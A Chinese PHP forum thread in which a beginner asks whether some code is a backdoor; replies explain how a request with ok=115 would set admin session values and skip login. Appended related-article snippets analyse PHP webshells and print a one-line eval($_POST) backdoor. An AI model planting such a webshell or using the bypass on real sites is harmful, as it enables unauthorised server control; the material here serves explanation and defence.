社区
基础编程
帖子详情
PHP 后门分析
rb277185653
2011-09-08 08:05:46
看一下这一个 代码是不是后门的代码 帮忙分析一下哦
每一句代表什么意思哦
我是 PHP 菜鸟
请帮忙 啊 !!!!!!
...全文
239
14
打赏
收藏
PHP 后门分析
看一下这一个 代码是不是后门的代码 帮忙分析一下哦 每一句代表什么意思哦 我是 PHP 菜鸟 请帮忙 啊 !!!!!!
复制链接
扫一扫
分享
转发到动态
举报
AI
作业
写回复
配置赞助广告
用AI写文章
14 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
rb277185653
2011-09-09
打赏
举报
回复
[Quote=引用 6 楼 abandonship 的回复:]
这的确算是个漏洞~
比如直接输入访问地址:www.abc.com/abc.php?ok=115即可绕过前面的验证~
[/Quote]
这样子做了,网页显示的是 白板 什么东西都没有哦 也不会自动登陆后台啊 ?
jlzan1314
2011-09-09
打赏
举报
回复
那2个session 和权限相关的,就是后门
黄袍披身
2011-09-09
打赏
举报
回复
[Quote=引用 6 楼 abandonship 的回复:]
这的确算是个漏洞~
比如直接输入访问地址:www.abc.com/abc.php?ok=115即可绕过前面的验证~
[/Quote]
漏洞可以,说是后门就牵强了.关键是这个代码是干嘛用的,如果是写代码的人水平不咋地...呵呵
光这么看是看不出来的。当然如果突然莫名其妙多了这段代码那就基本可以判断是后门咯
yunprince
2011-09-09
打赏
举报
回复
光看这段代码,应该是....
你用ok=115试哈
gzrhappy
2011-09-09
打赏
举报
回复
jxadmin 和 flag 是什么东西
不一定是后门 有可能是一些需要全局运用的东西
道常无名
2011-09-09
打赏
举报
回复
应该用sessions吧
伴老思源
2011-09-09
打赏
举报
回复
这的确算是个漏洞~
比如直接输入访问地址:www.abc.com/abc.php?ok=115即可绕过前面的验证~
码无边
2011-09-09
打赏
举报
回复
就是接收到get值,之后利用session存储。
木目子
2011-09-09
打赏
举报
回复
很明显……
$_SESSION部分是你的登录信息,实际上的代码是通过是否以get传递参数ok等于115为标准判断用户登录的,所以不管用户有没有输入密码,我只要?ok=115自动是管理员了
很明显我就猜着了吧???
bear63
2011-09-09
打赏
举报
回复
很明显不是。
if *** 判断表单是从网页点击了按钮,当然,这个可以伪造
开始session 一般建设session 放在最上面
设置管理员session值 估计是用户名
设置标志session值 估计是用户权限
yanghuangsheng
2011-09-09
打赏
举报
回复
要看整体代码才能确定
yunprince
2011-09-09
打赏
举报
回复
感觉 01....13 那些像操作的后台栏目权限样
木目子
2011-09-09
打赏
举报
回复
[Quote=引用 12 楼 rb277185653 的回复:]
引用 6 楼 abandonship 的回复:
这的确算是个漏洞~
比如直接输入访问地址:www.abc.com/abc.php?ok=115即可绕过前面的验证~
这样子做了,网页显示的是 白板 什么东西都没有哦 也不会自动登陆后台啊 ?
[/Quote]
空白之后,你再打开管理页面看看,是不是已经是登陆状态了!
黄袍披身
2011-09-08
打赏
举报
回复
这个无法判断...
但是你的代码里和jxadmin有关的都是什么?
PHP
大马
后门
分析
PHP
大马,用
php
写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能。网上很多地方都能下载到这些木马,但是大部门大马都会自带有
后门
,也就是当你上传木马到别人的服务器上的时候,该大马的制作者同样会通过
后门
获得服务器的权限。今天就来
分析
一波该大马中的
后门
。
分析
大马文件 打开下载的
php
大马,可以看出该大马是经过加密了的。 加密不用说,一看就是有
后门
从源码开头可以看见 eval(gzinflate(base64_decode(" base64+gzin..
常见
php
后门
分析
一、第一种 <?
php
define('test', 1); #定义一个常量 test,并且值为1 $test = $_POST[test];#因为前面定义了常量 test且值为1,而此处用了常量test:“$_POST[test]”,所以post传输数据必须为1,否则与前面定义的常量不一致,导致报错 if(test == 1){ @eval($test);#一句话木马
后门
} 连接方式 二、第二种 ...
在线扫描
php
后门
_一款猥琐的
PHP
后门
分析
近日,360网站卫士安全团队近期捕获一个基于
PHP
实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在
分析
这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的Webshell吧。Webshell代码如下:...
在线
php
后门
查找,一款猥琐的
PHP
后门
分析
近日,360网站卫士安全团队近期捕获一个基于
PHP
实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在
分析
这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的Webshell吧。Webshell代码如下:...
一个
PHP
混淆
后门
的
分析
洒家的朋友的公司的某个站发现最近被上传了一个
后门
程序。为了取证我们抓取了HTTP请求流量,看到了一堆莫名其妙看似经过混淆的请求,响应也是看似base64的乱码。洒家用了2个小时静态
分析
了一遍,并写了利用脚本。
后门
程序看似是乱码,实际上经过了混淆,通过eval()可以执行任意
PHP
命令。由于混淆得很乱,做起来实在把洒家恶心了一番。
后门
源代码:<?
php
/** * Signature For...
基础编程
21,893
社区成员
140,348
社区内容
发帖
与我相关
我的任务
基础编程
从PHP安装配置,PHP入门,PHP基础到PHP应用
复制链接
扫一扫
分享
社区描述
从PHP安装配置,PHP入门,PHP基础到PHP应用
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章